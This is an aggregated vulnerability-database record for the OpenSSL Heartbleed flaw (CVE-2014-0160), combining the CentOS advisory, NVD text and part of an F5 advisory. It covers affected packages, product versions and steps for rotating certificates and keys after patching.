ID CESA-2014:0376 Type centos Reporter CentOS Project Modified 2014-04-08T02:54:58
Description
CentOS Errata and Security Advisory CESA-2014:0376
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols, as well as a
full-strength, general purpose cryptography library.
An information disclosure flaw was found in the way OpenSSL handled TLS and
DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server
could send a specially crafted TLS or DTLS Heartbeat packet to disclose a
limited portion of memory per request from a connected client or server.
Note that the disclosed portions of memory could potentially include
sensitive information such as private keys. (CVE-2014-0160)
Red Hat would like to thank the OpenSSL project for reporting this issue.
Upstream acknowledges Neel Mehta of Google Security as the original
reporter.
All OpenSSL users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue. For the update to take
effect, all services linked to the OpenSSL library (such as httpd and other
SSL-enabled services) must be restarted or the system rebooted.
Merged security bulletin from advisories:
http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html
{"bulletinFamily": "unix", "affectedPackage": [{"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-static-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl-static", "operator": "lt", "arch": "i686", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-perl-1.0.1e-16.el6_5.7.x86_64.rpm", "packageName": "openssl-perl", "operator": "lt", "arch": "x86_64", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-devel-1.0.1e-16.el6_5.7.x86_64.rpm", "packageName": "openssl-devel", "operator": "lt", "arch": "x86_64", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-perl-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl-perl", "operator": "lt", "arch": "i686", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-devel-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl-devel", "operator": "lt", "arch": "i686", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-devel-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl-devel", "operator": "lt", "arch": "i686", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-static-1.0.1e-16.el6_5.7.x86_64.rpm", "packageName": "openssl-static", "operator": "lt", "arch": "x86_64", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-1.0.1e-16.el6_5.7.src.rpm", "packageName": "openssl", "operator": "lt", "arch": "any", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-1.0.1e-16.el6_5.7.x86_64.rpm", "packageName": "openssl", "operator": "lt", "arch": "x86_64", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl", "operator": "lt", "arch": "i686", "OSVersion": "6"}, {"OS": "CentOS", "packageVersion": "1.0.1e-16.el6_5.7", "packageFilename": "openssl-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl", "operator": "lt", "arch": "i686", "OSVersion": "6"}], "viewCount": 8, "reporter": "CentOS Project", "references": ["https://rhn.redhat.com/errata/RHSA-2014-0376.html"], "description": "**CentOS Errata and Security Advisory** CESA-2014:0376\n\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-April/020249.html\n\n**Affected packages:**\nopenssl\nopenssl-devel\nopenssl-perl\nopenssl-static\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0376.html", "hashmap": [{"key": "affectedPackage", "hash": "4e51fcfdd32842a95fca825d4f1f9e1d"}, {"key": "bulletinFamily", "hash": "4913a9178621eadcdf191db17915fbcb"}, {"key": "cvelist", "hash": "558f8e06acb9904c2df3eef5d5dc7dd3"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "description", "hash": "a1f95a5b4d320c7688d72d1e7751dab8"}, {"key": "href", "hash": "b93858a1cc8873a0b16d89b7745c19d0"}, {"key": "modified", "hash": "d8c32efc2ba146902379c7b9a34ae6d0"}, {"key": "published", "hash": "d8c32efc2ba146902379c7b9a34ae6d0"}, {"key": "references", "hash": "902ce01b069f7512f5d7313ca229e048"}, {"key": "reporter", "hash": "9855627921475e40e00f92d60af14cb3"}, {"key": "title", "hash": "99ece7d8bdc1c348de2af4c3efd96ebc"}, {"key": "type", "hash": "cdc872db616ac66adb3166c75e9ad183"}], "href": "http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html", "modified": "2014-04-08T02:54:58", "objectVersion": "1.3", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-0160"]}, {"type": "f5", "idList": ["F5:K15159", "SOL15159"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2014-0160"]}, {"type": "kitploit", "idList": ["KITPLOIT:8800200070735873517", "KITPLOIT:7942195329946074809", "KITPLOIT:8661324951126484733"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30472", "SECURITYVULNS:DOC:30504", "SECURITYVULNS:DOC:30473", "SECURITYVULNS:DOC:30496", "SECURITYVULNS:DOC:30525", "SECURITYVULNS:DOC:30519", "SECURITYVULNS:DOC:30478", "SECURITYVULNS:DOC:30474", "SECURITYVULNS:DOC:30506", "SECURITYVULNS:DOC:30524"]}, {"type": "hackerone", "idList": ["H1:32570", "H1:6475", "H1:6626", "H1:44294", "H1:49139"]}, {"type": "seebug", "idList": ["SSV:62086", "SSV:62240", "SSV:62181", "SSV:86061", "SSV:95013", "SSV:62239", "SSV:62190", "SSV:62182", "SSV:62241", "SSV:62186"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-38927", "ATLASSIAN:JRACLOUD-38927"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:0492-1"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2014-0376.NASL", "MCAFEE_FIREWALL_ENTERPRISE_SB10071.NASL", "AIX_OPENSSL_ADVISORY7.NASL", "F5_BIGIP_SOL15159.NASL", "OPENSUSE-2014-277.NASL", "ATTACHMATE_REFLECTION_HEARTBLEED.NASL", "HP_OFFICEJET_PRO_HEARTBLEED.NASL", "MCAFEE_EMAIL_GATEWAY_SB10071.NASL", "FORTINET_FG-IR-14-011.NASL", "SYMANTEC_ENDPOINT_PROT_MGR_12_1_RU4_MP1A.NASL"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SERVER/OPENSSL_HEARTBEAT_CLIENT_MEMORY", "MSF:AUXILIARY/SCANNER/SSL/OPENSSL_HEARTBLEED"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103936", "OPENVAS:1361412562310702896", "OPENVAS:871154", "OPENVAS:1361412562310881918", "OPENVAS:1361412562310850582"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-0376"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2896-2:FEB91", "DEBIAN:DSA-2896-1:7AEC1"]}, {"type": "thn", "idList": ["THN:0F7112302CBABF46D19CACCCFA6103C5", "THN:244769C413FFA5BE647D8F6F93431B74", "THN:8D999AEE5218AD3BFA68E5ACE101F201"]}, {"type": "myhack58", "idList": ["MYHACK58:62201444409"]}, {"type": "ics", "idList": ["ICSA-14-135-05", "ICSA-14-135-04"]}, {"type": "redhat", "idList": ["RHSA-2014:0376"]}, {"type": "nmap", "idList": ["NMAP:SSL-HEARTBLEED.NSE"]}, {"type": "cert", "idList": ["VU:720951"]}, {"type": "threatpost", "idList": ["THREATPOST:9012A325F248438FAC15C4FB3082A796", "THREATPOST:2C5C82CF691D70F64A14DA1BEC242DD5", "THREATPOST:15624C23F5CD5AC1029501D08A99D294"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20140417-HEARTBLEED"]}, {"type": "zdt", "idList": ["1337DAY-ID-22122"]}, {"type": "n0where", "idList": ["N0WHERE:76566"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:126101", "PACKETSTORM:126308"]}, {"type": "freebsd", "idList": ["5631AE98-BE9E-11E3-B5E3-C80AA9043978"]}], "modified": "2019-05-29T18:34:52"}, "score": {"value": 5.9, "vector": "NONE", "modified": "2019-05-29T18:34:52"}, "vulnersScore": 5.9}, "id": "CESA-2014:0376", "title": "openssl security update", "hash": "58c6b2a558d4ea44a4e84d3383c477243a29a7a4d05ffbace952a63909958d79", "edition": 2, "published": "2014-04-08T02:54:58", "type": "centos", "history": [{"bulletin": {"affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "arch": "i686", "operator": "lt", "packageFilename": "openssl-static-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl-static", "packageVersion": "1.0.1e-16.el6_5.7"}, {"OS": "CentOS", "OSVersion": "6", "arch": "x86_64", "operator": "lt", "packageFilename": "openssl-perl-1.0.1e-16.el6_5.7.x86_64.rpm", "packageName": "openssl-perl", "packageVersion": "1.0.1e-16.el6_5.7"}, {"OS": "CentOS", "OSVersion": "6", "arch": "x86_64", "operator": "lt", "packageFilename": "openssl-devel-1.0.1e-16.el6_5.7.x86_64.rpm", "packageName": "openssl-devel", "packageVersion": "1.0.1e-16.el6_5.7"}, {"OS": "CentOS", "OSVersion": "6", "arch": "i686", "operator": "lt", "packageFilename": "openssl-perl-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl-perl", "packageVersion": "1.0.1e-16.el6_5.7"}, {"OS": "CentOS", "OSVersion": "6", "arch": "i686", "operator": "lt", "packageFilename": "openssl-devel-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl-devel", "packageVersion": "1.0.1e-16.el6_5.7"}, {"OS": "CentOS", "OSVersion": "6", "arch": "i686", "operator": "lt", "packageFilename": "openssl-devel-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl-devel", "packageVersion": "1.0.1e-16.el6_5.7"}, {"OS": "CentOS", "OSVersion": "6", "arch": "x86_64", "operator": "lt", "packageFilename": "openssl-static-1.0.1e-16.el6_5.7.x86_64.rpm", "packageName": "openssl-static", "packageVersion": "1.0.1e-16.el6_5.7"}, {"OS": "CentOS", "OSVersion": "6", "arch": "any", "operator": "lt", "packageFilename": "openssl-1.0.1e-16.el6_5.7.src.rpm", "packageName": "openssl", "packageVersion": "1.0.1e-16.el6_5.7"}, {"OS": "CentOS", "OSVersion": "6", "arch": "x86_64", "operator": "lt", "packageFilename": "openssl-1.0.1e-16.el6_5.7.x86_64.rpm", "packageName": "openssl", "packageVersion": "1.0.1e-16.el6_5.7"}, {"OS": "CentOS", "OSVersion": "6", "arch": "i686", "operator": "lt", "packageFilename": "openssl-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl", "packageVersion": "1.0.1e-16.el6_5.7"}, {"OS": "CentOS", "OSVersion": "6", "arch": "i686", "operator": "lt", "packageFilename": "openssl-1.0.1e-16.el6_5.7.i686.rpm", "packageName": "openssl", "packageVersion": "1.0.1e-16.el6_5.7"}], "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "description": "**CentOS Errata and Security Advisory** CESA-2014:0376\n\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-April/020249.html\n\n**Affected packages:**\nopenssl\nopenssl-devel\nopenssl-perl\nopenssl-static\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0376.html", "edition": 1, "enchantments": {"dependencies": {"modified": "2017-10-03T18:24:38", "references": [{"idList": ["OPENVAS:871154", "OPENVAS:1361412562310702896", "OPENVAS:881918", "OPENVAS:1361412562310103936", "OPENVAS:1361412562310105722", "OPENVAS:1361412562310850582", "OPENVAS:1361412562310881918"], "type": "openvas"}, {"idList": ["PACKETSTORM:126070", "PACKETSTORM:126308", "PACKETSTORM:126101", "PACKETSTORM:126069"], "type": "packetstorm"}, {"idList": ["THREATPOST:15624C23F5CD5AC1029501D08A99D294", "THREATPOST:2C5C82CF691D70F64A14DA1BEC242DD5", "THREATPOST:9012A325F248438FAC15C4FB3082A796"], "type": "threatpost"}, {"idList": ["F5:K15159", "SOL15159"], "type": "f5"}, {"idList": ["NMAP:SSL-HEARTBLEED.NSE"], "type": "nmap"}, {"idList": ["CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940"], "type": "cloudfoundry"}, {"idList": ["HUAWEI-SA-20140417-HEARTBLEED"], "type": "huawei"}, {"idList": ["SECURITYVULNS:DOC:30523", "SECURITYVULNS:DOC:30508", "SECURITYVULNS:DOC:30472", "SECURITYVULNS:DOC:30530", "SECURITYVULNS:DOC:30511", "SECURITYVULNS:DOC:30494", "SECURITYVULNS:DOC:30509", "SECURITYVULNS:DOC:30477", "SECURITYVULNS:DOC:30498", "SECURITYVULNS:DOC:30520"], "type": "securityvulns"}, {"idList": ["ICSA-14-126-01A", "ICSA-14-135-02", "ICSA-14-114-01", "ICSA-14-135-04"], "type": "ics"}, {"idList": ["MSF:AUXILIARY/SCANNER/SSL/OPENSSL_HEARTBLEED", "MSF:AUXILIARY/SERVER/OPENSSL_HEARTBEAT_CLIENT_MEMORY"], "type": "metasploit"}, {"idList": ["JUNOS_PULSE_JSA10623.NASL", "OPENSUSE-2014-318.NASL", "OPENVPN_HEARTBLEED.NASL", "HP_VCA_SSRT101531.NASL", "ALA_ALAS-2014-320.NASL", "KASPERSKY_INTERNET_SECURITY_HEARTBLEED.NASL", "JUNIPER_JSA10623.NASL", "REDHAT-RHSA-2014-0377.NASL", "MCAFEE_NGFW_SB10071.NASL", "MCAFEE_VSEL_SB10071.NASL"], "type": "nessus"}, {"idList": ["DEBIAN:DSA-2896-2:FEB91"], "type": "debian"}, {"idList": ["ATLASSIAN:JRACLOUD-38927"], "type": "atlassian"}, {"idList": ["KITPLOIT:8800200070735873517", "KITPLOIT:7942195329946074809", "KITPLOIT:8661324951126484733"], "type": "kitploit"}, {"idList": ["5631AE98-BE9E-11E3-B5E3-C80AA9043978"], "type": "freebsd"}, {"idList": ["THN:8D999AEE5218AD3BFA68E5ACE101F201", "THN:0F7112302CBABF46D19CACCCFA6103C5", "THN:4868B616BCBA555DA2446F6F0EA837B0"], "type": "thn"}, {"idList": ["VULNERLAB:1254"], "type": "vulnerlab"}, {"idList": ["H1:32570", "H1:49139"], "type": "hackerone"}, {"idList": ["CVE-2014-0160"], "type": "cve"}, {"idList": ["CISCO-SA-20140408-CVE-2014-0160"], "type": "cisco"}, {"idList": ["RHSA-2014:0378"], "type": "redhat"}, {"idList": ["1337DAY-ID-22122", "1337DAY-ID-22114"], "type": "zdt"}, {"idList": ["SSV:62182", "SSV:62241", "SSV:62239", "SSV:62186", "SSV:62240", "SSV:62199", "SSV:62190", "SSV:62181", "SSV:62189", "SSV:62185"], "type": "seebug"}, {"idList": ["N0WHERE:76566"], "type": "n0where"}, {"idList": ["OPENSSL:CVE-2014-0160"], "type": "openssl"}]}, "score": {"value": 5.0, "vector": "NONE"}}, "hash": "296a9c5d1b6e5c33b459ca011159ad33c580c16b0fca5caa1fbe42bbd7d33d00", "hashmap": [{"hash": "b93858a1cc8873a0b16d89b7745c19d0", "key": "href"}, {"hash": "4e51fcfdd32842a95fca825d4f1f9e1d", "key": "affectedPackage"}, {"hash": "d8c32efc2ba146902379c7b9a34ae6d0", "key": "modified"}, {"hash": "d8c32efc2ba146902379c7b9a34ae6d0", "key": "published"}, {"hash": "9855627921475e40e00f92d60af14cb3", "key": "reporter"}, {"hash": "902ce01b069f7512f5d7313ca229e048", "key": "references"}, {"hash": "a792e2393dff1e200b885c5245988f6f", "key": "cvss"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "558f8e06acb9904c2df3eef5d5dc7dd3", "key": "cvelist"}, {"hash": "cdc872db616ac66adb3166c75e9ad183", "key": "type"}, {"hash": "99ece7d8bdc1c348de2af4c3efd96ebc", "key": "title"}, {"hash": "a1f95a5b4d320c7688d72d1e7751dab8", "key": "description"}], "history": [], "href": "http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html", "id": "CESA-2014:0376", "lastseen": "2017-10-03T18:24:38", "modified": "2014-04-08T02:54:58", "objectVersion": "1.3", "published": "2014-04-08T02:54:58", "references": ["https://rhn.redhat.com/errata/RHSA-2014-0376.html"], "reporter": "CentOS Project", "title": "openssl security update", "type": "centos", "viewCount": 7}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2017-10-03T18:24:38"}], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvelist": ["CVE-2014-0160"], "lastseen": "2019-05-29T18:34:52", "scheme": null}
{"cve": [{"lastseen": "2019-10-10T12:13:41", "bulletinFamily": "NVD", "description": "The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\nCVSS V2 scoring evaluates the impact of the vulnerability on the host where the vulnerability is located. When evaluating the impact of this vulnerability to your organization, take into account the nature of the data that is being protected and act according to your organization\u2019s risk acceptance. While CVE-2014-0160 does not allow unrestricted access to memory on the targeted host, a successful exploit does leak information from memory locations which have the potential to contain particularly sensitive information, e.g., cryptographic keys and passwords. Theft of this information could enable other attacks on the information system, the impact of which would depend on the sensitivity of the data and functions of that system.", "modified": "2019-10-09T23:09:00", "id": "CVE-2014-0160", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160", "published": "2014-04-07T22:55:00", "title": "CVE-2014-0160", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "f5": [{"lastseen": "2019-12-13T10:22:14", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 456033 (BIG-IP), ID 456302 (BIG-IP Edge Client for Windows, Mac OS, and Linux), ID 456345 (BIG-IP Edge Client for Apple iOS), and ID 468659 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H456276 on the **Diagnostics** > **Identified** > **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP AAM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.4.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP AFM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.3.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Analytics | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP APM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP ASM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Edge Gateway | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None \nBIG-IP GTM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Link Controller | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP PEM | 11.5.0 - 11.5.1 | 11.3.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 | None \nARX | None | 6.0.0 - 6.4.0 | None \nEnterprise Manager | 3.1.1 HF1 - HF2 | 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0 | big3d \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | None \nBIG-IQ Cloud | None | 4.0.0 - 4.3.0 | None \nBIG-IQ Device | None | 4.2.0 - 4.3.0 | None \nBIG-IQ Security | None | 4.0.0 - 4.3.0 | None \nFirePass Clients | None | 5520-6032 | None \nBIG-IP Edge Portal for iOS | None | 1.0.0 - 1.0.3 | None \nBIG-IP Edge Portal for Android | None | 1.0.0 - 1.0.2 | None \nBIG-IP Edge Clients for Android | None | 2.0.3 - 2.0.4 | None \nBIG-IP Edge Clients for Apple iOS | 2.0.0 - 2.0.1 \n1.0.5 - 1.0.6 | 2.0.2 \n1.0.0 - 1.0.4 | VPN \nBIG-IP Edge Clients for Linux | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nBIG-IP Edge Clients for MAC OS X | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nBIG-IP Edge Clients for Windows | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nLineRate | None | 2.2.0 | None \n \n**Important**: For the hotfixes noted previously, the included version of OpenSSL has not been changed. F5 has patched the existing version of OpenSSL to resolve this vulnerability. As a result, on a patched BIG-IP system, the OpenSSL version is still OpenSSL 1.0.1e-fips. For more information about installed hotfix versions, refer to [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>).\n\nBIG-IP Edge Client fixes\n\nThis issue has been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in BIG-IP APM 11.5.1 HF2 and 11.5.0 HF3. This issue has also been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in an engineering hotfix in other BIG-IP APM versions. You can obtain the engineering hotfix by contacting [F5 Technical Support](<http:// http://www.f5.com/training-support/customer-support/contact/>) and referencing this article number and the associated ID number. Note that engineering hotfixes are intended to resolve a specific software issue until a suitable minor release, maintenance release, or cumulative hotfix rollup release is available that includes the software fix. For more information, refer to [K8986: F5 software lifecycle policy](<https://support.f5.com/csp/article/K8986>).\n\nYou can eliminate this vulnerability by running a version listed in the **Versions known to be not vulnerable** column. If the **Versions known to be not vulnerable** column does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nUpgrading to a version known to be not vulnerable, or taking steps to mitigate this vulnerability, does not eliminate possible damage that may have already occurred as a result of this vulnerability. After upgrading to a version that is known to be not vulnerable, consider the following components that may have been compromised by this vulnerability:\n\nSSL profile certificate/key pairs\n\nThe BIG-IP SSL profiles may reference SSL certificate/key pairs that were compromised. For information about creating new SSL certificate/key pairs for SSL profiles, refer to the following articles:\n\n * [K14620: Managing SSL certificates for BIG-IP systems using the Configuration utility](<https://support.f5.com/csp/article/K14620>)\n * [K14534: Creating SSL certificates and keys with OpenSSL (11.x - 14.x)](<https://support.f5.com/csp/article/K14534>)\n * [K13579: Generating new default certificate and key pairs for BIG-IP SSL profiles](<https://support.f5.com/csp/article/K13579>)\n\nBIG-IP device certificate/key pairs\n\nThe BIG-IP system may have a device certificate/key pair that was compromised. For information about creating new SSL certificate/key pairs, refer to the following articles:\n\n * [K9114: Creating a new SSL device certificate and key pair](<https://support.f5.com/csp/article/K9114>)\n * [K7754: Renewing self-signed device certificates](<https://support.f5.com/csp/article/K7754>)\n\n**Important**: After you generate a new device certificate and private key pair, you must re-establish device trusts. Additionally, the device certificates are used for GTM sync groups and Enterprise Manager monitoring. As a result, you must recreate the GTM sync groups and rediscover devices managed by Enterprise Manager.\n\nCMI certificate/key pairs\n\nThe BIG-IP system may have a centralized management infrastructure (CMI) certificate/key pair (used for device group communication and synchronization) that was compromised. To regenerate the CMI certificate/key pairs on devices in a device group, and rebuild the device trust, perform the following procedure:\n\n**Impact of procedure**: F5 recommends that you perform this procedure during a maintenance window. This procedure causes the current device to lose connectivity with all other BIG-IP devices. Depending on the device group and traffic group configuration, the connectivity loss may result in an unintentional active-active condition that causes a traffic disruption. To prevent a standby device from going active, set the standby device in the device group to **Force Offline** before performing the procedure. Standby devices that were set to **Force Offline** should be set to **Release Offline** after performing the procedure.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Device Management **> **Device Trust** > **Local Domain**.\n 3. Click **Reset Device Trust**.\n 4. Select the **Generate new self-signed authority** option.\n 5. Click **Update** (or **Next**).\n 6. Click **Finished**.\n\nRepeat this procedure for each device in the device group.\n\nAfter you complete the device trust reset on all devices, set up the device trust by performing the procedures described in the following articles:\n\n * [K13649: Creating a device group using the Configuration utility (11.x - 12.x)](<https://support.f5.com/csp/article/K13649>)\n * [K13639: Configuring a device group using tmsh](<https://support.f5.com/csp/article/K13639>)\n * [K13946: Troubleshooting ConfigSync and device service clustering issues (11.x - 13.x)](<https://support.f5.com/csp/article/K13946>)\n\nThe big3d process\n\nThe BIG-IP system may have a vulnerable version of the** big3d **process under the following conditions:\n\n * The BIG-IP GTM system is running 11.5.0 or 11.5.1.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected BIG-IP GTM system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if a BIG-IP GTM system running 11.5.0 or 11.5.1 installs **big3d** 11.5.0 on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n * The Enterprise Manager system is running 3.1.1 HF1 or HF2.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected Enterprise Manager system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if an Enterprise Manager system running 3.1.1 